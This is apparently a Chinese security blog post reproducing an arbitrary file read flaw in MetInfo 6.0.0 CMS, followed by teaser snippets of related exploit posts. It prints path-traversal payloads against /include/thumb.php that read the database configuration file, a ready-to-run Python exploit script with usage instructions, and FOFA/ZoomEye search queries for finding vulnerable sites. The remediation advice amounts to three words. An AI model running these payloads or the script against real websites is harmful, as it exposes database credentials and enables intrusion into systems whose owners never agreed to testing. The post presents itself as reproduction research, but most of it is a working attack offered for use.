Metinfo6.0.0任意文件读取漏洞复现

时间：2023-09-05 23:12:46浏览次数：49

标签：__ http 读取 Metinfo6.0 漏洞复现 php config dir

1.1、漏洞描述

漏洞名称：MetInfo任意文件读取

漏洞简介：MetInfo是一套使用PHP和MySQL开发的内容管理系统，其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞，攻击者可利用该漏洞读取网站的敏感文件。

下载地址：历史版本安装文件下载 Ver_6.0.0

1.2、漏洞等级

高危

1.3、影响版本

影响版本：MetInfo 6.0.0

1.4、漏洞复现

代码审计

defined('IN_MET') or exit('No permission');

load::sys_class('web');

class old_thumb extends web{

      public function doshow(){
        global $_M;

         $dir = str_replace(array('../','./'), '', $_GET['dir']);


        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

$dir = str_replace(array('../','./'), '', $_GET['dir']);

dir变量接受来自$_GET['dir']传递进来的值，用了str_replace函数做替换，将../，./替换成空值

readfile($dir);

漏洞点

/include/thumb.php

使用bp进行抓包

测试一：

/include/thumb.php?dir=..././http/..././config/config_db.php

测试二：

/include/thumb.php?dir=.....///http/.....///config/config_db.php

测试三：

/include/thumb.php?dir=http/.....///.....///config/config_db.php

测试四：

/include/thumb.php?dir=http\..\..\config\config_db.php
    
   
# 此POC 仅适用于Windows 系统，Linux 下无效  
#    只有windows以右斜杠作为文件路径分隔符

1.5、深度利用

EXP编写

import requests
import sys

banner = """
MetInfo 6.0.0
    ___________.__.__           __________                   .___
    \_   _____/|__|  |   ____   \______   \ ____ _____     __| _/
    |    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | 
    |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | 
    \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | 
        \/                 \/          \/     \/     \/      \/ 
     
Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

dir_list = [
    "..././http/..././config/config_db.php",
    ".....///http/.....///config/config_db.php",
    "http/.....///.....///config/config_db.php",
    "http\..\..\config\config_db.php"
]

def attack(host):
    vul = "/include/thumb.php"
    url = host + vul

    res = requests.get(url = url, headers = headers)

    if res.status_code != 200:
        print(f"[INFO] {vul} is Not Exists!")
        exit()

    print(f"[INFO] {vul} is Exists!")

    for param in dir_list:
        params = {
            "dir":  param 
        }

        res = requests.get(url = url, params = params, headers = headers)

        print(f"[INFO] Test URL: {res.url}")

        if "<?php" in res.text:
            print("[RESULT] The target is vulnreable!")
            print(f"[RESULT]\n{res.text}")
            break

if len(sys.argv) < 2:
    print(banner)
    exit()

host = sys.argv[1]

attack(host = host)

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修复建议

升级
打补丁
上设备

标签：__,http,读取,Metinfo6.0,漏洞,复现,php,config,dir
From： https://www.cnblogs.com/saury/p/17681114.html

Metinfo5.0.4-任意文件包含漏洞复现
目录文件包含漏洞描述：漏洞等级影响版本漏洞利用蚁剑连接图片马读取敏感目录读取php源码登录管理员界面http://127.0.0.1/MetInfo5.0.4/admin/上传一句话木马,或者图片马制作图片木马copy1.jpg/b+1.php/a2.jpg文件包含首页漏洞描述：MetInfo是一个专业的企业级CMS建......
typecho_v1.0-14.10.10_反序列化漏洞复现
目录漏洞利用GetShell下载链接：https://pan.baidu.com/s/1z0w7ret-uXHMuOZpGYDVlw提取码：lt7aTypecho-反序列化漏洞大佬博客Typechoinstall.php存在的反序列化漏洞首页漏洞点：/install.php?finish=漏洞利用漏洞利用脚本phpinfo()信息<?php//typecho_1.0(14.10.......
Node.js 使用 officecrypto-tool 读取加密的 Excel (xls, xlsx) 和 Word( docx)文档
Node.js使用officecrypto-tool读取加密的Excel(xls,xlsx)和Word(docx)文档,还支持xlsx和docx文件的加密（具体使用看文档）。暂时不支持doc文件的解密传送门：officecrypto-tool读取加密的Excel示例一：xlsx-populate//只支持xlsx，xlsx-populate自带了解密功能，/......
【漏洞复现】万户协同办公平台 ezoffice未授权漏洞
万户协同办公平台ezoffice简介万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用漏洞描述万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户ezoffice协同管理平台存在未授权访问漏洞，攻击者可以从evoInterfaceServlet接口获得系统登......
泛微E-Office文件上传漏洞复现（CVE-2023-2523&CVE-2023-2648）
漏洞概述cve-2023-2523泛微e-office9.5版本，源文件App/Ajax/ajax.php?action=mobile_upload_save的一些未知功能存在问题。参数upload_quwan的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。cve-2023-2648由于泛微e-off......
SpringBoot 读取配置文件
在resources文件下创建新的配置文件，如test.yml：es:name:elasticsearch准备使用@PropertySource注解来读取test.yml内容，但@PropertySource本身不支持yml文件，所以创建以下类：publicclassPropertySourceConfigextendsDefaultPropertySourceFactory{@Override......
泛微E-cology XXE漏洞复现(QVD-2023-16177)
漏洞概述泛微e-cology某处功能点最初针对用户输入的过滤不太完善，导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过，本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限。影响版本泛微EC9.x且补丁版本<10.58.2......
【漏洞复现】Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454
一、Jeecg-Boot简介JeecgBoot是一款基于BPM的低代码平台！前后端分离架构SpringBoot2.x，SpringCloud，AntDesign&Vue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发！JeecgBoot引领新低代码开发模式OnlineCoding->代码生成器->手工MERGE，......
AssetBundle打包和读取
基本信息创建了项目名有YoyoProject工程，是一个3D模板的工程，使用的是unity2021版本，windows11系统。打包打包路径stringdataPath=Application.dataPath;stringpersistentDataPath=Application.persistentDataPath;stringstreamingAssetsPath=Application.stream......
python 创建、读取xml 文件
使用xml.dom.minidom1.创建fromxml.dom.minidomimportDocument#创建xml文件doc=Document()#创建根节点root_node=doc.createElement("root")doc.appendChild(root_node)#创建子节点son_node=doc.createElement("son_node")root_node.appendChild(son......